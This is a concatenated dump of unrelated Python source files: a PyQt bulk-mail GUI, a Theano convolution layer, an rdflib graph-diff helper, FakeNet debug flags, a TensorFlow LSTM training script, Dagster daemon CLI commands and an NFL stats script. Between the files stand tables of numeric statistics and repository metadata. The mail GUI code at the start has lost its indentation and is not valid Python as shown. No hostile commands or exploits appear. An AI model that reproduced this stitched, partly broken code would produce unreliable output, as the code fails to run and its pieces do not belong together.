all_files = org_files + ',' + file_name if org_files else file_name
obj.setText(all_files)
def print_html(self, index):
if index:
self.in_edit_web.setHtml(self.in_edit_html.toPlainText())
def send_mail(self):
eml_type = self.in_eml_type.text()
eml_file = self.in_eml_template.text()
user_group = self.in_recipient_group.text()
mail_excel = self.in_recipient_excel.text()
annex_file = self.in_annex_file.text()
url = self.data_db[5] if self.data_db else 'http://yumail.myvnc.com'
try:
if self.cb_scheduler.isChecked():
my_time = self.in_scheduler.text()+':00'
client = Client()
client.send(self.data_smtp[:4], self.data_db[:5], eml_type, eml_file, user_group, mail_excel, annex_file, url, my_time)
QMessageBox.information(self, 'Success!', '排程設定成功!', QMessageBox.Ok)
else:
sm = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) if self.data_smtp else Smtp()
db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db else Database()
insert_send_mail(eml_type, eml_file, user_group, mail_excel, sm, db, annex=annex_file, url=url)
sm.close()
db.__disconnect__()
QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)
        except Exception:
QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)
def show_sub_win(self):
if self.data_smtp:
self.sub_win = SubWindow()
self.sub_win.btn_send.clicked.connect(self.send_test)
self.sub_win.show()
else:
QMessageBox.warning(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)
def send_test(self):
try:
if self.data_smtp:
mailserver = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3])
mail_msg = gm.gen_test_eml(['Test Email', '測試寄件人', self.data_smtp[2], self.sub_win.in_recipient.text()], self.data_smtp[5])
error = mailserver.send(mail_msg.as_string(), self.data_smtp[2], self.sub_win.in_recipient.text())
mailserver.close()
if error:
QMessageBox.warning(self, 'Warning!', '信件寄出成功!\nWaning: '+error, QMessageBox.Ok)
else:
QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)
self.sub_win.in_recipient.clear()
        except Exception:
QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)
def eml_open(self):
self.in_edit_html.clear()
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)")
if not file_name:
return
header, html = gm.get_msg(file_name)
self.in_edit_sender.setText(header[2])
self.in_edit_sender_name.setText(header[1])
self.in_edit_subject.setText(header[0])
self.in_edit_html.insertPlainText(html)
def eml_save(self):
header, msg = [], ''
header.append(self.in_edit_subject.text())
header.append(self.in_edit_sender_name.text())
header.append(self.in_edit_sender.text())
header.append('test@email.com')
annex_file = self.in_edit_annex.text().split(',')
html = self.in_edit_html.toPlainText()
if not any(header[:3]) or not html:
return
try:
msg = gm.gen_eml(header, html, annex_file) if self.cb_edit_annex.isChecked() else gm.gen_eml(header, html)
file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Eml Files (*.eml)')
with open(file_path, 'w') as outfile:
gen = generator.Generator(outfile)
gen.flatten(msg)
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
except Exception:
QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
def eml_reset(self):
items = self.get_items_from_layout(self.right_layout)
for item in items:
if isinstance(item, QLineEdit):
item.clear()
self.cb_edit_annex.setChecked(False)
self.in_edit_html.clear()
def logs_change(self):
if not self.data_logs or not self.in_logs_data.text():
return
self.data_temp_logs = []
self.tbw_logs.setRowCount(0)
# header = {'郵件類型':'type', '郵件主旨':'subject', '使用者群組':'user_group', '使用者信箱':'user_email'}
condition = self.cmb_logs_choice.currentText()
content = self.in_logs_data.text()
row_num = len(self.data_logs)
col_num = len(self.data_logs[0])
# self.tbw_logs.setRowCount(row_num)
self.tbw_logs.setColumnCount(col_num)
for i in range(row_num):
switch = False
if condition == 'date' and content in str(self.data_logs[i][condition]):
switch = True
elif self.data_logs[i][condition] == content:
switch = True
if switch:
self.tbw_logs.insertRow(self.tbw_logs.rowCount())
row_data = list(self.data_logs[i].values())
self.data_temp_logs.append(self.data_logs[i])
for j in range(col_num):
temp_data = row_data[j]
item = QTableWidgetItem(str(temp_data))
item.setForeground(QBrush(QColor(144, 182, 240)))
self.tbw_logs.setItem(self.tbw_logs.rowCount()-1, j, item)
def logs_download(self):
if self.data_temp_logs:
try:
file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.xlsx)')
if not file_path:
return
df = DataFrame(self.data_temp_logs)
df.to_excel(file_path, index=False)
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
except Exception:
QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
else:
QMessageBox.warning(self, "缺少資料", "請確認是否有資料可以下載", QMessageBox.Ok)
def quit_act(self):
# sender is the object that emitted the signal
sender = self.sender()
print(sender.text() + '键被按下')
qApp = QApplication.instance()
qApp.quit()
def main():
app = QApplication(sys.argv)
gui = MailserverUi()
gui.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| 41.75365
| 151
| 0.617193
| 2,943
| 22,881
| 4.561332
| 0.133877
| 0.036651
| 0.077846
| 0.082241
| 0.445694
| 0.357122
| 0.330676
| 0.303784
| 0.248063
| 0.1802
| 0
| 0.022542
| 0.261309
| 22,881
| 548
| 152
| 41.75365
| 0.771625
| 0.019405
| 0
| 0.221957
| 0
| 0
| 0.04008
| 0.001039
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062053
| false
| 0.009547
| 0.033413
| 0.002387
| 0.112172
| 0.009547
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86947b6782d353d9c52f3c8165971a18131a9c5c
| 3,869
|
py
|
Python
|
nntools/layers/corrmm.py
|
317070/nntools
|
00e2865b1f8246254b3adc22c37989a8b77718d5
|
[
"MIT"
] | null | null | null |
nntools/layers/corrmm.py
|
317070/nntools
|
00e2865b1f8246254b3adc22c37989a8b77718d5
|
[
"MIT"
] | null | null | null |
nntools/layers/corrmm.py
|
317070/nntools
|
00e2865b1f8246254b3adc22c37989a8b77718d5
|
[
"MIT"
] | null | null | null |
"""
GpuCorrMM-based convolutional layers
"""
import numpy as np
import theano
import theano.tensor as T
from theano.sandbox.cuda.basic_ops import gpu_contiguous
from theano.sandbox.cuda.blas import GpuCorrMM
from .. import init
from .. import nonlinearities
from . import base
# base class for all layers that rely on GpuCorrMM directly
class MMLayer(base.Layer):
pass
class Conv2DMMLayer(MMLayer):
def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1), border_mode=None, untie_biases=False,
W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify, pad=None,
flip_filters=False):
super(Conv2DMMLayer, self).__init__(input_layer)
if nonlinearity is None:
self.nonlinearity = nonlinearities.identity
else:
self.nonlinearity = nonlinearity
self.num_filters = num_filters
self.filter_size = filter_size
self.strides = strides
self.untie_biases = untie_biases
self.flip_filters = flip_filters
if border_mode is not None and pad is not None:
raise RuntimeError("You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.")
elif border_mode is None and pad is None:
# no option specified, default to valid mode
self.pad = (0, 0)
elif border_mode is not None:
if border_mode == 'valid':
self.pad = (0, 0)
elif border_mode == 'full':
self.pad = (self.filter_size[0] - 1, self.filter_size[1] - 1)
elif border_mode == 'same':
# only works for odd filter size, but the even filter size case is probably not worth supporting.
self.pad = ((self.filter_size[0] - 1) // 2, (self.filter_size[1] - 1) // 2)
else:
raise RuntimeError("Unsupported border_mode for Conv2DMMLayer: %s" % border_mode)
else:
self.pad = pad
self.W = self.create_param(W, self.get_W_shape())
if b is None:
self.b = None
elif self.untie_biases:
output_shape = self.get_output_shape()
self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3]))
else:
self.b = self.create_param(b, (num_filters,))
self.corr_mm_op = GpuCorrMM(subsample=self.strides, pad=self.pad)
def get_W_shape(self):
num_input_channels = self.input_layer.get_output_shape()[1]
return (self.num_filters, num_input_channels, self.filter_size[0], self.filter_size[1])
def get_params(self):
return [self.W] + self.get_bias_params()
def get_bias_params(self):
return [self.b] if self.b is not None else []
def get_output_shape_for(self, input_shape):
batch_size = input_shape[0]
input_width, input_height = input_shape[2:4]
output_width = (input_width + 2*self.pad[0] - self.filter_size[0]) // self.strides[0] + 1
output_height = (input_height + 2*self.pad[1] - self.filter_size[1]) // self.strides[1] + 1
return (batch_size, self.num_filters, output_width, output_height)
def get_output_for(self, input, *args, **kwargs):
filters = self.W
if self.flip_filters:
filters = filters[:, :, ::-1, ::-1] # flip width, height
contiguous_filters = gpu_contiguous(filters)
contiguous_input = gpu_contiguous(input)
conved = self.corr_mm_op(contiguous_input, contiguous_filters)
if self.b is None:
activation = conved
elif self.untie_biases:
activation = conved + self.b.dimshuffle('x', 0, 1, 2)
else:
activation = conved + self.b.dimshuffle('x', 0, 'x', 'x')
return self.nonlinearity(activation)
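# Hedged worked example (values are hypothetical, not from the original
# file): with a (1, 3, 32, 32) input, num_filters=16, filter_size=(5, 5),
# strides=(1, 1) and border_mode='same', the constructor sets
# pad = ((5 - 1) // 2, (5 - 1) // 2) = (2, 2), and get_output_shape_for
# gives (32 + 2*2 - 5) // 1 + 1 = 32 along each spatial axis, i.e. an
# output shape of (1, 16, 32, 32).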
| 37.931373
| 135
| 0.632205
| 517
| 3,869
| 4.535783
| 0.235977
| 0.055437
| 0.053731
| 0.025586
| 0.142431
| 0.093817
| 0.093817
| 0.026439
| 0
| 0
| 0
| 0.015498
| 0.266219
| 3,869
| 101
| 136
| 38.306931
| 0.810497
| 0.065392
| 0
| 0.12
| 0
| 0.013333
| 0.045228
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0.013333
| 0.106667
| 0.026667
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8696b91ed345a9efbc515a25e28bfe35f30846c8
| 3,831
|
py
|
Python
|
ldtools/helpers.py
|
dmr/Ldtools
|
9cc5474404a07bd4b7ad756d31306dfc37a39c7b
|
[
"BSD-2-Clause"
] | 3
|
2015-12-24T15:18:46.000Z
|
2022-02-09T06:56:40.000Z
|
ldtools/helpers.py
|
dmr/Ldtools
|
9cc5474404a07bd4b7ad756d31306dfc37a39c7b
|
[
"BSD-2-Clause"
] | 1
|
2016-10-10T17:26:05.000Z
|
2016-10-10T17:26:05.000Z
|
ldtools/helpers.py
|
dmr/Ldtools
|
9cc5474404a07bd4b7ad756d31306dfc37a39c7b
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
try:
unicode
except NameError:
basestring = unicode = str # Python 3
import logging
import rdflib
from rdflib import compare
logger = logging.getLogger("ldtools")
RESET_SEQ = "\033[0m"
COLOR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
# The background is set with 40 plus the number of the color, and
# the foreground with 30
# These are the sequences needed to get colored output
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
COL = {
'DEBUG': BLUE, 'INFO': MAGENTA,
'WARNING': YELLOW, 'CRITICAL': YELLOW, 'ERROR': RED}
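# Worked example (illustrative): COLOR_SEQ % (30 + COL['ERROR']) expands
# to "\033[1;31m" (foreground base 30 plus RED == 1), so an ERROR level
# name is wrapped as "\033[1;31mERROR\033[0m" by the formatter below.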
def set_colored_logger(verbosity_level):
class ColoredFormatter(logging.Formatter):
def format(self, record):
if record.levelname in COL:
record.levelname = COLOR_SEQ % (
30 + COL[record.levelname]) + record.levelname + RESET_SEQ
record.msg = unicode(record.msg)
record.msg = COLOR_SEQ % (30 + GREEN) + record.msg + RESET_SEQ
return logging.Formatter.format(self, record)
formatter = ColoredFormatter("%(asctime)s %(name)s %(funcName)s:%(lineno)d"
" %(levelname)s: %(message)s")
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger = logging.getLogger()
logger.addHandler(handler)
logger2 = logging.getLogger("ldtools._add_property")
logger2.setLevel(logging.INFO)
mapper = {1: logging.DEBUG,
2: logging.INFO,
3: logging.WARNING,
4: logging.ERROR,
5: None}
try:
log_level = mapper[verbosity_level]
except KeyError:
log_level = mapper[2]
if log_level:
logger.setLevel(log_level)
return logger
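# Hedged usage sketch (not part of the original module):
#     log = set_colored_logger(1)      # root logger at DEBUG via `mapper`
#     log.info("fetching resource")    # message printed green, level name colored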
def my_graph_diff(graph1, graph2):
"""Compares graph2 to graph1 and highlights everything that changed.
Colored if pygments available"""
# quick fix for wrong type
if not type(graph1) == type(graph2) == rdflib.Graph:
if type(graph1) == rdflib.ConjunctiveGraph:
g1contexts = list(graph1.contexts())
assert len(g1contexts) == 1
graph1 = g1contexts[0]
if type(graph2) == rdflib.ConjunctiveGraph:
g2contexts = list(graph2.contexts())
assert len(g2contexts) == 1
graph2 = g2contexts[0]
# Return if both graphs are isomorphic
iso1 = compare.to_isomorphic(graph1)
iso2 = compare.to_isomorphic(graph2)
if graph1.identifier == graph2.identifier:
str_bit = u"The 2 '%s' Graphs" % graph1.identifier
else:
str_bit = (u"Graphs '%s' and '%s'"
% (graph1.identifier, graph2.identifier))
if iso1 == iso2:
logger.debug(u"%s are isomorphic" % str_bit)
return
print(u"Differences between %s." % str_bit)
in_both, in_first, in_second = compare.graph_diff(iso1, iso2)
def dump_nt_sorted(g):
return sorted(g.serialize(format='nt').splitlines())
sorted_first = dump_nt_sorted(in_first)
sorted_second = dump_nt_sorted(in_second)
import difflib
diff = difflib.unified_diff(
sorted_first,
sorted_second,
u'Original',
u'Current',
lineterm=''
)
try:
from pygments import highlight
from pygments.formatters import terminal
from pygments.lexers import web
lexer = web.XmlLexer()
formatter = terminal.TerminalFormatter()
print(highlight(u'\n'.join(diff), lexer, formatter))
except ImportError:
logger.info("Install pygments for colored diffs")
print(u'\n'.join(diff))
except UnicodeDecodeError:
print(u"Only in first", unicode(sorted_first))
print(u"Only in second", unicode(sorted_second))
| 30.895161
| 79
| 0.631689
| 453
| 3,831
| 5.231788
| 0.370861
| 0.025316
| 0.01519
| 0.027004
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023683
| 0.261551
| 3,831
| 123
| 80
| 31.146341
| 0.814069
| 0.085095
| 0
| 0.032609
| 0
| 0
| 0.089137
| 0.012611
| 0
| 0
| 0
| 0
| 0.021739
| 1
| 0.043478
| false
| 0
| 0.097826
| 0.01087
| 0.195652
| 0.065217
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8696be28bebb97248ddd7aa9ff8ffc4d35ce9393
| 1,420
|
py
|
Python
|
fakenet/diverters/debuglevels.py
|
AzzOnFire/flare-fakenet-ng
|
bafd7e97b61cd43190dee7f1d2c3f4388488af76
|
[
"Apache-2.0"
] | null | null | null |
fakenet/diverters/debuglevels.py
|
AzzOnFire/flare-fakenet-ng
|
bafd7e97b61cd43190dee7f1d2c3f4388488af76
|
[
"Apache-2.0"
] | null | null | null |
fakenet/diverters/debuglevels.py
|
AzzOnFire/flare-fakenet-ng
|
bafd7e97b61cd43190dee7f1d2c3f4388488af76
|
[
"Apache-2.0"
] | null | null | null |
# Debug print levels for fine-grained debug trace output control
DNFQUEUE = (1 << 0) # netfilterqueue
DGENPKT = (1 << 1) # Generic packet handling
DGENPKTV = (1 << 2) # Generic packet handling with TCP analysis
DCB = (1 << 3) # Packet handling callbacks
DPROCFS = (1 << 4) # procfs
DIPTBLS = (1 << 5) # iptables
DNONLOC = (1 << 6) # Nonlocal-destined datagrams
DDPF = (1 << 7) # DPF (Dynamic Port Forwarding)
DDPFV = (1 << 8) # DPF (Dynamic Port Forwarding) Verbose
DIPNAT = (1 << 9) # IP redirection for nonlocal-destined datagrams
DMANGLE = (1 << 10) # Packet mangling
DPCAP = (1 << 11) # Pcap write logic
DIGN = (1 << 12) # Packet redirect ignore conditions
DFTP = (1 << 13) # FTP checks
DMISC = (1 << 27) # Miscellaneous
DCOMP = 0x0fffffff # Component mask
DFLAG = 0xf0000000 # Flag mask
DEVERY = 0x0fffffff # Log everything, low verbosity
DEVERY2 = 0x8fffffff # Log everything, complete verbosity
DLABELS = {
DNFQUEUE: 'NFQUEUE',
DGENPKT: 'GENPKT',
DGENPKTV: 'GENPKTV',
DCB: 'CB',
DPROCFS: 'PROCFS',
DIPTBLS: 'IPTABLES',
DNONLOC: 'NONLOC',
DDPF: 'DPF',
DDPFV: 'DPFV',
DIPNAT: 'IPNAT',
DMANGLE: 'MANGLE',
DPCAP: 'PCAP',
DIGN: 'IGN',
DFTP: 'FTP',
DIGN | DFTP: 'IGN-FTP',
DMISC: 'MISC',
}
DLABELS_INV = {v.upper(): k for k, v in DLABELS.items()}
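# Hedged usage sketch (illustrative, not part of the original module):
# masks compose with bitwise OR and decode through DLABELS / DLABELS_INV.
_example_mask = DIPTBLS | DPCAP                 # trace iptables and pcap logic only
assert _example_mask & DCOMP == _example_mask   # no flag bits set
assert DLABELS_INV['PCAP'] == DPCAP             # reverse lookup by label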
| 33.023256
| 72
| 0.592958
| 166
| 1,420
| 5.066265
| 0.614458
| 0.030916
| 0.049941
| 0.057075
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048544
| 0.274648
| 1,420
| 42
| 73
| 33.809524
| 0.767961
| 0.359155
| 0
| 0
| 0
| 0
| 0.091114
| 0
| 0
| 0
| 0.044994
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869714958dec93fb87488625f1ab7000485c9fb2
| 3,175
|
py
|
Python
|
multichannel_lstm/train.py
|
zhr1201/Multi-channel-speech-extraction-using-DNN
|
4e48869e02b815a8b094acc9251ac6586fda350c
|
[
"MIT"
] | 65
|
2017-08-04T03:36:56.000Z
|
2022-03-10T07:25:17.000Z
|
multichannel_lstm/train.py
|
zhr1201/Multi-channel-speech-extraction-using-DNN
|
4e48869e02b815a8b094acc9251ac6586fda350c
|
[
"MIT"
] | 7
|
2017-10-10T02:34:08.000Z
|
2019-09-27T08:59:27.000Z
|
multichannel_lstm/train.py
|
zhr1201/Multi-channel-speech-extraction-using-DNN
|
4e48869e02b815a8b094acc9251ac6586fda350c
|
[
"MIT"
] | 39
|
2017-08-02T04:27:37.000Z
|
2021-11-03T06:43:25.000Z
|
'''
Script for training the model
'''
import tensorflow as tf
import numpy as np
from input import BatchGenerator
from model import MultiRnn
import time
from datetime import datetime
import os
import matplotlib as mpl
mpl.use('Agg')
from matplotlib import pyplot as plt
sum_dir = 'sum' # dir to write summary
train_dir = 'ckpt' # dir to store the model
data_dir = 'train.pkl' # dir of the data set
NEFF = 129 # effective FFT points
batch_size = 128
num_steps = 20
epochs = 2000
cell_type = 'NL_LSTM'
state_size = 256
output_size = 129
num_layer = 3
learning_rate = 0.0001
# build the model
rnn_model = MultiRnn(
cell_type, state_size, output_size,
batch_size, num_layer, learning_rate, num_steps)
# input data and reference data placeholder
in_data = tf.placeholder(
tf.float32, [batch_size, num_steps, 2 * NEFF])
ref_data = tf.placeholder(
tf.float32, [batch_size, num_steps, NEFF])
# make inference
init_state, final_state, inf_data = rnn_model.inference(in_data)
# compute loss
loss = rnn_model.loss(inf_data, ref_data)
saver = tf.train.Saver(tf.all_variables())
summary_op = tf.merge_all_summaries()
train_op = rnn_model.train(loss)
batch_gen = BatchGenerator(data_dir, batch_size, num_steps, epochs)
with tf.Session() as sess:
summary_writer = tf.train.SummaryWriter(
sum_dir, sess.graph)
sess.run(tf.initialize_all_variables())
steps = 0
# generator for epoch data
for idx, epoch in enumerate(batch_gen.gen_epochs()):
training_state = None
# generator for batch data
for f_data, b_data, r_data, v_data in epoch:
start_time = time.time()
steps += 1
in_data_np = np.concatenate((f_data, b_data), axis=2)
if steps % 100 == 0:
feed_dict = {in_data: in_data_np, ref_data: r_data}
if training_state is not None:
feed_dict[init_state] = training_state
# training the net
loss_value, training_state, _, summary_str, test_inf = sess.run(
[loss, final_state, train_op, summary_op, inf_data], feed_dict)
duration = time.time() - start_time
sec_per_batch = float(duration)
examples_per_sec = batch_size / duration
format_str = (
'%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch, epoch %d)')
print (format_str % (datetime.now(), steps, loss_value,
examples_per_sec, sec_per_batch,
idx))
summary_writer.add_summary(summary_str, steps)
else:
feed_dict = {in_data: in_data_np, ref_data: r_data}
if training_state is not None:
feed_dict[init_state] = training_state
loss_value, training_state, _ = sess.run(
[loss, final_state, train_op], feed_dict)
if steps % 10000 == 0:
checkpoint_path = os.path.join(train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=steps)
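# Hedged shape note (derived from the placeholders above, not part of the
# original script): np.concatenate((f_data, b_data), axis=2) stacks the two
# input channels along the feature axis, so in_data_np has shape
# (batch_size, num_steps, 2 * NEFF) = (128, 20, 258), matching in_data,
# while r_data must be (128, 20, 129) to match ref_data.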
| 33.776596
| 83
| 0.624252
| 429
| 3,175
| 4.351981
| 0.321678
| 0.022496
| 0.02571
| 0.027317
| 0.170327
| 0.170327
| 0.170327
| 0.140332
| 0.140332
| 0.094269
| 0
| 0.019947
| 0.289449
| 3,175
| 93
| 84
| 34.139785
| 0.807624
| 0.084094
| 0
| 0.084507
| 0
| 0
| 0.036678
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.126761
| 0
| 0.126761
| 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8697573e23a0bff4599f9e6ef4bcf4db3b6b315f
| 4,002
|
py
|
Python
|
python_modules/dagster/dagster/daemon/cli/__init__.py
|
elsenorbw/dagster
|
b38822d7463812624dab0b2dae7c62e2a8d59828
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/daemon/cli/__init__.py
|
elsenorbw/dagster
|
b38822d7463812624dab0b2dae7c62e2a8d59828
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/daemon/cli/__init__.py
|
elsenorbw/dagster
|
b38822d7463812624dab0b2dae7c62e2a8d59828
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
import threading
import time
import warnings
from contextlib import ExitStack
import click
import pendulum
from dagster import __version__
from dagster.core.instance import DagsterInstance
from dagster.daemon.controller import (
DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS,
DagsterDaemonController,
all_daemons_healthy,
all_daemons_live,
daemon_controller_from_instance,
debug_daemon_heartbeats,
get_daemon_status,
)
from dagster.utils.interrupts import capture_interrupts, raise_interrupts_as
def _get_heartbeat_tolerance():
tolerance = os.getenv(
"DAGSTER_DAEMON_HEARTBEAT_TOLERANCE",
)
return int(tolerance) if tolerance else DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS
@click.command(
name="run",
help="Run any daemons configured on the DagsterInstance.",
)
def run_command():
with capture_interrupts():
with DagsterInstance.get() as instance:
if instance.is_ephemeral:
raise Exception(
"dagster-daemon can't run using an in-memory instance. Make sure "
"the DAGSTER_HOME environment variable has been set correctly and that "
"you have created a dagster.yaml file there."
)
with daemon_controller_from_instance(
instance, heartbeat_tolerance_seconds=_get_heartbeat_tolerance()
) as controller:
controller.check_daemon_loop()
@click.command(
name="health-check",
help="DEPRECATED, use liveness-check instead",
)
def health_check_command():
warnings.warn("health-check is deprecated. Use liveness-check instead.")
with DagsterInstance.get() as instance:
if all_daemons_healthy(instance, heartbeat_tolerance_seconds=_get_heartbeat_tolerance()):
click.echo("Daemon healthy")
else:
click.echo("Daemon not healthy")
sys.exit(1)
@click.command(
name="liveness-check",
help="Check for recent heartbeats from the daemon.",
)
@click.option(
"--heartbeat-tolerance",
required=False,
default=DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS,
help="How long (in seconds) to allow a daemon to go without heartbeating before failing the dagster-daemon process.",
)
def liveness_check_command(heartbeat_tolerance):
with DagsterInstance.get() as instance:
if all_daemons_live(instance, heartbeat_tolerance_seconds=heartbeat_tolerance):
click.echo("Daemon live")
else:
click.echo("Daemon(s) not running")
sys.exit(1)
@click.command(
name="wipe",
help="Wipe all heartbeats from storage.",
)
def wipe_command():
with DagsterInstance.get() as instance:
instance.wipe_daemon_heartbeats()
click.echo("Daemon heartbeats wiped")
@click.command(
name="heartbeat",
help="Read and write a heartbeat",
)
def debug_heartbeat_command():
with DagsterInstance.get() as instance:
debug_daemon_heartbeats(instance)
@click.command(
name="heartbeat-dump",
help="Log all heartbeat statuses",
)
def debug_heartbeat_dump_command():
with DagsterInstance.get() as instance:
for daemon_type in instance.get_required_daemon_types():
click.echo(get_daemon_status(instance, daemon_type))
@click.group(
commands={"heartbeat": debug_heartbeat_command, "heartbeat-dump": debug_heartbeat_dump_command}
)
def debug_group():
"Daemon debugging utils"
def create_dagster_daemon_cli():
commands = {
"run": run_command,
"health-check": health_check_command,
"liveness-check": liveness_check_command,
"wipe": wipe_command,
"debug": debug_group,
}
@click.group(commands=commands)
@click.version_option(version=__version__)
def group():
"CLI tools for working with the dagster daemon process."
return group
cli = create_dagster_daemon_cli()
def main():
cli(obj={}) # pylint:disable=E1123
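# Hedged CLI sketch (command names come from create_dagster_daemon_cli
# above; the tolerance value is hypothetical):
#     dagster-daemon run
#     dagster-daemon liveness-check --heartbeat-tolerance 600
#     DAGSTER_DAEMON_HEARTBEAT_TOLERANCE=600 dagster-daemon health-check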
| 28.183099
| 121
| 0.696902
| 462
| 4,002
| 5.800866
| 0.279221
| 0.080597
| 0.05597
| 0.053731
| 0.248507
| 0.181343
| 0.104478
| 0.084328
| 0.051493
| 0.051493
| 0
| 0.00191
| 0.215142
| 4,002
| 141
| 122
| 28.382979
| 0.851321
| 0.024738
| 0
| 0.13913
| 0
| 0.008696
| 0.224372
| 0.013819
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095652
| false
| 0
| 0.104348
| 0
| 0.217391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869758494ec4227a029bca8c4e214109b3aea62a
| 331
|
py
|
Python
|
tests/exhaustive/nfl_tests.py
|
atklaus/sportsreference
|
22a45ea83ce1608c3176f00d4f414d5b9463605c
|
[
"MIT"
] | 1
|
2020-03-08T20:17:39.000Z
|
2020-03-08T20:17:39.000Z
|
tests/exhaustive/nfl_tests.py
|
atklaus/sportsreference
|
22a45ea83ce1608c3176f00d4f414d5b9463605c
|
[
"MIT"
] | null | null | null |
tests/exhaustive/nfl_tests.py
|
atklaus/sportsreference
|
22a45ea83ce1608c3176f00d4f414d5b9463605c
|
[
"MIT"
] | null | null | null |
import sys, os
sys.path.append(os.path.dirname(os.path.dirname(sys.path[0])))
from sportsreference.nfl.teams import Teams
for team in Teams():
print(team.name)
for player in team.roster.players:
print(player.name)
for game in team.schedule:
print(game.dataframe)
print(game.dataframe_extended)
| 27.583333
| 62
| 0.700906
| 49
| 331
| 4.714286
| 0.469388
| 0.060606
| 0.112554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003704
| 0.18429
| 331
| 11
| 63
| 30.090909
| 0.851852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0.4
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86979f732a31535e5210a87577515eada4d424aa
| 1,116
|
py
|
Python
|
rust-old/python/examples/map_fields.py
|
SerebryakovMA/quelea
|
4bac70d60852a454ad6533d08a02e018c75dc377
|
[
"MIT"
] | 3
|
2021-03-01T15:35:49.000Z
|
2021-04-04T17:24:48.000Z
|
rust-old/python/examples/map_fields.py
|
SerebryakovMA/quelea
|
4bac70d60852a454ad6533d08a02e018c75dc377
|
[
"MIT"
] | null | null | null |
rust-old/python/examples/map_fields.py
|
